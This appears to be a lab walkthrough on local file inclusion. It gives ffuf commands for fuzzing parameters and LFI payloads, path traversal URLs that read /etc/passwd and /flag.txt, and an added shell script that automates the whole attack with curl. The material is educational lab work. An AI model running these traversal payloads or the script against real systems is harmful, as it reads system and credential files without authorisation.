Automated Scanning

Fuzz the web application for exposed parameters, then exploit the one you find with an LFI wordlist to read /flag.txt.

Step 1 - Fuzz parameters:

  • Use the burp-parameter-names.txt wordlist with the following command. The -fs value is the size of the response the application returns for a parameter it ignores (2309 bytes here); run the command once without -fs to learn it, then filter that size away so only parameters the application actually reads remain:

    • ffuf -w burp-parameter-names.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?FUZZ' -fs 2309

  • On this target the parameter that survives the filter is view, which the next step targets.

Step 2 - Fuzz LFI payloads:

  • Use the LFI-Jhaddix.txt wordlist against the view parameter. Again, -fs drops the size of the response to a payload that fails (1935 bytes here), so what is left are candidate payloads; size filtering still produces false positives, so verify hits by hand in the next step:

    • ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?view=FUZZ' -fs 1935

Step 3 - Test one of the discovered payloads:

  • Append the payload to the application URL. A real hit returns the file contents; the line beginning root:x:0:0: confirms it is /etc/passwd rather than an error page that happens to have a different size. Extra ../ segments past the filesystem root are harmless, which is why a long run of them is used rather than guessing the exact depth:

    • http://SERVER_IP:SERVER_PORT/index.php?view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Step 4 - Get the flag:

  • Now substitute /flag.txt for /etc/passwd in the payload (the leading slash of the target path is dropped, since the ../ run already lands at the root):

    • ../../../../../../../../../../../../../../../../../../../../../../flag.txt

And the flag is found!
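The four steps above, as an added example that is not part of the original notes: the same procedure scripted with curl instead of ffuf, so the baseline-size comparison behind -fs and the content check behind "is this really /etc/passwd" are explicit. It assumes the target URL from the notes (override with TARGET), SecLists wordlists at the paths passed on the command line, and the view parameter found in Step 1; the network-touching functions only run when LFI_RUN is set.

```sh
#!/bin/sh
# Added example, not from the original notes. Assumes TARGET, the SecLists
# wordlists passed as $1/$2, and the vulnerable parameter "view".
TARGET="${TARGET:-http://SERVER_IP:SERVER_PORT/index.php}"

# Size of the response body for a URL; this is the number ffuf's -fs compares.
body_size() {
    curl -s -o /dev/null -w '%{size_download}' "$1"
}

# Step 1: print parameter names whose response size differs from the
# baseline, i.e. what "ffuf ... -fs <baseline>" keeps. The baseline is the
# size returned for a made-up parameter the application certainly ignores.
fuzz_params() {
    wordlist="$1"
    baseline=$(body_size "${TARGET}?zzzdoesnotexist=1")
    while IFS= read -r name; do
        [ -z "$name" ] && continue
        size=$(body_size "${TARGET}?${name}=1")
        [ "$size" != "$baseline" ] && printf '%s %s\n' "$name" "$size"
    done < "$wordlist"
}

# Build a traversal payload: DEPTH copies of "../" followed by the target
# path with its leading slash dropped. Overshooting the real depth is safe
# because "../" at / stays at /, hence the 22 used in the notes.
lfi_payload() {
    depth="$1"; file="$2"
    prefix=""
    i=0
    while [ "$i" -lt "$depth" ]; do
        prefix="${prefix}../"
        i=$((i + 1))
    done
    printf '%s%s' "$prefix" "${file#/}"
}

# Reads a response body on stdin and succeeds only if it carries the
# /etc/passwd signature, so a same-sized error page is not mistaken for a hit.
looks_like_passwd() {
    grep -q '^root:x:0:0:'
}

# Steps 2 and 3: send each wordlist payload raw (as ffuf does) through the
# vulnerable parameter and keep the ones whose body really is /etc/passwd.
fuzz_lfi() {
    wordlist="$1"; param="${2:-view}"
    while IFS= read -r payload; do
        [ -z "$payload" ] && continue
        if curl -s "${TARGET}?${param}=${payload}" | looks_like_passwd; then
            printf 'hit: %s\n' "$payload"
        fi
    done < "$wordlist"
}

# Step 4: read an arbitrary file through the confirmed traversal.
read_file() {
    param="${1:-view}"; file="${2:-/flag.txt}"
    curl -s "${TARGET}?${param}=$(lfi_payload 22 "$file")"
}

# Usage (needs the lab target reachable, so it only runs when LFI_RUN is set):
#   LFI_RUN=1 sh lfi.sh burp-parameter-names.txt LFI-Jhaddix.txt
if [ -n "$LFI_RUN" ]; then
    fuzz_params "$1"
    fuzz_lfi "$2" view
    read_file view /flag.txt
fi
```

Payloads are concatenated into the query string unencoded, matching ffuf's substitution of FUZZ; wordlist entries that already contain %2e or %00 sequences therefore reach the server exactly as written.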
